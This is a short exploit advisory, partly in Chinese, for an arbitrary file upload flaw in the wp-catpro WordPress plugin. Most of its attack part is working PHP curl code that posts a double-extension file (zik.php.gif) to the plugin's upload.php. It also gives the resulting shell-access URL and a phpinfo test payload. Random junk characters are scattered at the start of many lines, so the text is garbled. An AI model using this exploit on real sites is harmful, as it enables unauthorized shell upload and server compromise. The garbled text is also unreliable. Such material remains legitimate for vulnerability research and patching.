WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

作者  => Zikou-16
; I3 m% Y( i( j) m' s邮箱 => zikou16x@gmail.com
测试系统 : Windows 7 , Backtrack 5r3
+ _- c) K3 S5 l* X2 E/ f& |下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

0 c, |& Y+ y  _0 k; L#=> Exploit 信息:
------------------
9 w  Q1 p( ?5 G# 攻击者可以上传 file/shell.php.gif
1 U" a$ h5 q: O) D# t! B# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
! J5 ?, M. m" _) h" |------------------
3 l6 Z' g" u$ ~) T  E3 F# Z
#=> Exploit
-----------
<?php

0 x6 A8 q" U, r$uploadfile="zik.php.gif";
: E% U5 o5 s7 C5 n, q# m$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
" d8 Z$ r% V$ }curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
  r  Y9 P( K2 \) M& y4 Carray('Filedata'=>"@$uploadfile",
6 \: e# ^1 s( ]- [' q'folder'=>'/wp-content/uploads/catpro/'));
  P1 a9 E" @4 N# Ocurl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  n$ Z+ Z' ~2 I$postResult = curl_exec($ch);
, j+ J6 l- z1 T: Kcurl_close($ch);

print "$postResult";

Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
  ?>
0 O$ \$ b- ?% V- r# b4 y; _, V<?php
phpinfo();
  z7 p6 n3 H, P) c?>